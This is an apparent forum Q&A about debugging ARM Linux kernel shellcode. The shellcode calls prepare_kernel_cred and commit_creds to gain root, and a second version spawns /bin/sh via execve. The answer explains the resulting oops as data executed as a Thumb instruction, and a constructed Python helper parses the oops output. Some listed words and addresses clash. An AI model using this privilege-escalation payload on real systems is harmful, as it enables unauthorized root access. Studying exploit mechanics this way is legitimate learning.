My assembly code is
00000000 <_start>:
0: e28f6001 add r6, pc, #1
4: e12fff16 bx r6
8: 1b24 subs r4, r4, r4
a: 1c20 adds r0, r4, #0
c: 4a01 ldr r2, [pc, #4] ; (14 <_start+0x14>)
e: 4790 blx r2
10: 4a01 ldr r2, [pc, #4] ; (18 <_start+0x18>)
12: 4790 blx r2
14: 80047dbc .word 0x8003f924 ; prepare_kernel_cred
18: 80047a0c .word 0x8003f56c ; commit_creds
When this assembly code is executed, a segmentation fault occurs, and the error message is
1010201d : 4a
1010201e : 90
1010201f : 47
10102020 : 1
10102021 : 4a
10102022 : 90
10102023 : 47
10102024 : 24
10102025 : f9
10102026 : 3
10102027 : 80
10102028 : 6c
10102029 : f5
1010202a : 3
1010202b : 80
Unable to handle kernel NULL pointer dereference at virtual address 00000000
pgd = 82d44000
[00000000] *pgd=63b28831, *pte=00000000, *ppte=00000000
Internal error: Oops: 17 [#16] SMP ARM
Modules linked in: m(PO)
CPU: 0 PID: 660 Comm: test Tainted: P D W O 3.11.4 #13
task: 86834b40 ti: 8686c000 task.ti: 8686c000
PC is at 0x10102024
LR is at commit_creds+0x78/0x210
pc : [<10102024>] lr : [<8003f5e4>] psr: 20000033
sp : 8686dfa8 ip : 00000000 fp : 00000000
r10: 00000000 r9 : 8686c000 r8 : 8000e348
r7 : 00000000 r6 : 10102019 r5 : 0000001c r4 : 00000000
r3 : 00000001 r2 : 00000000 r1 : 00000001 r0 : 00000000
Flags: nzCv IRQs on FIQs on Mode SVC_32 ISA Thumb Segment user
Control: 10c53c7d Table: 62d4406a DAC: 00000015
Process test (pid: 660, stack limit = 0x8686c238)
Stack: (0x8686dfa8 to 0x8686e000)
dfa0: 00000000 0000001c 00000001 00000000 0000001c ffffffff
dfc0: 00000000 0000001c 00000000 00000000 00000000 00000000 76fb0000 00000000
dfe0: 7ec0dd00 7ec0dcf0 00008643 76f3b8f0 20000010 00000001 00000000 00000000
[<8003f5e4>] (commit_creds+0x78/0x210) from [<0000001c>] (0x1c)
Code: 4a01 4790 4a01 4790 (f924) 8003
---[ end trace 1b1bf4ebadf07b63 ]---
Segmentation fault
I think PC is 0x10102024 refers to `14: 8003f924 .word 0x80047dbc`, because the machine code at 0x1010204 is \x24\xf9\x03\x80.
However, I do not understand what "Unable to handle kernel NULL pointer dereference at virtual address 00000000" means.
PC is 0x10102024, so why does a kernel NULL pointer dereference happen?
00000000 <_start>:
0: e28f6001 add r6, pc, #1
4: e12fff16 bx r6
8: 1b24 subs r4, r4, r4
a: 1c20 adds r0, r4, #0
c: 4a0a ldr r2, [pc, #40] ; (38 <shellcode+0x22>)
e: 4790 blx r2
10: 4a0a ldr r2, [pc, #40] ; (3c <shellcode+0x26>)
12: 4790 blx r2
14: e7ff b.n 16 <shellcode>
00000016 <shellcode>:
16: 0000 movs r0, r0
18: e28f6001 add r6, pc, #1
1c: e12fff16 bx r6
20: 4678 mov r0, pc
22: 300a adds r0, #10
24: 9001 str r0, [sp, #4]
26: a901 add r1, sp, #4
28: 1a92 subs r2, r2, r2
2a: 270b movs r7, #11
2c: df01 svc 1
2e: 2f2f .short 0x2f2f
30: 2f6e6962 .word 0x2f6e6962
34: 00006873 .word 0x00006873
38: 80047dbc .word 0x80047dbc
3c: 80047a0c .word 0x80047a0c
Answer 0: (score: 2)
In situations where you have managed to go beyond the normal flow of the program and start executing random garbage memory, it is always useful to understand what the processor thinks is going on: if that last blx returns, then you end up executing data. What does that look like? Well, 'disassembling' arbitrary raw binary is fun:
$ echo '24 f9 03 80' | xxd -r -p - hexfile
$ arm-linux-gnueabihf-objdump -bbinary -marm -D -Mforce-thumb hexfile
hexfile: file format binary
Disassembly of section .data:
00000000 <.data>:
0: f924 8003 vld4.8 {d8-d11}, [r4], r3
Huh, how about that. By pure coincidence, executing that address as a Thumb instruction results in a load using a base register which happens to be null at the time, hence the page fault.
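As an added example (not part of the question or the answer above), a small Python helper that applies the same reasoning to the oops text itself: it maps the halfwords on the `Code:` line back to addresses around PC, works out which of them form the 32-bit Thumb encoding at PC, and confirms that they are exactly the `.word 0x8003f924` read back as little-endian code. The `Code:` line, the PC value and the word value are taken from the trace above; everything else is constructed.

```python
# Sample input, constructed from the oops quoted in the question above.
OOPS_CODE_LINE = "Code: 4a01 4790 4a01 4790 (f924) 8003"
OOPS_PC = 0x10102024
PREPARE_KERNEL_CRED_WORD = 0x8003f924   # the .word the code falls through into

def parse_oops_code(line):
    """Split an ARM oops 'Code:' line into Thumb halfwords and the index of
    the parenthesised halfword, which is the one the kernel reports PC at."""
    tokens = line.split(":", 1)[1].split()
    halfwords, fault_idx = [], None
    for i, tok in enumerate(tokens):
        if tok.startswith("(") and tok.endswith(")"):
            fault_idx = i
            tok = tok[1:-1]
        halfwords.append(int(tok, 16))
    return halfwords, fault_idx

def thumb_insn_len(hw):
    """Thumb halfwords whose top five bits are 11101, 11110 or 11111 begin a
    32-bit encoding; everything else is a 16-bit instruction."""
    return 4 if (hw >> 11) in (0b11101, 0b11110, 0b11111) else 2

def word_as_thumb(word):
    """A little-endian .word as the CPU sees it when fetched as Thumb code:
    two halfwords, low half first."""
    return [word & 0xFFFF, word >> 16]

def map_code_to_addresses(line, pc):
    """Return (address, halfword, is_pc) for every halfword, so the bytes on
    the 'Code:' line can be matched against a memory dump of the payload."""
    halfwords, fault_idx = parse_oops_code(line)
    base = pc - 2 * fault_idx          # halfwords are listed in address order
    return [(base + 2 * i, hw, i == fault_idx) for i, hw in enumerate(halfwords)]

def faulting_halfwords(line):
    """The halfword(s) that make up the instruction at PC."""
    halfwords, fault_idx = parse_oops_code(line)
    n = thumb_insn_len(halfwords[fault_idx]) // 2
    return halfwords[fault_idx:fault_idx + n]

if __name__ == "__main__":
    for addr, hw, is_pc in map_code_to_addresses(OOPS_CODE_LINE, OOPS_PC):
        print(f"{addr:08x}: {hw:04x}{'  <- PC' if is_pc else ''}")
    print("at PC:", [hex(h) for h in faulting_halfwords(OOPS_CODE_LINE)])
    print("same as .word 0x8003f924 read as Thumb:",
          faulting_halfwords(OOPS_CODE_LINE) == word_as_thumb(PREPARE_KERNEL_CRED_WORD))
```

The addresses it prints (0x1010201c for the first 4a01, 0x10102024 for f924) line up with the byte dump in the question, which is the check to do before trusting any conclusion drawn from the `Code:` line.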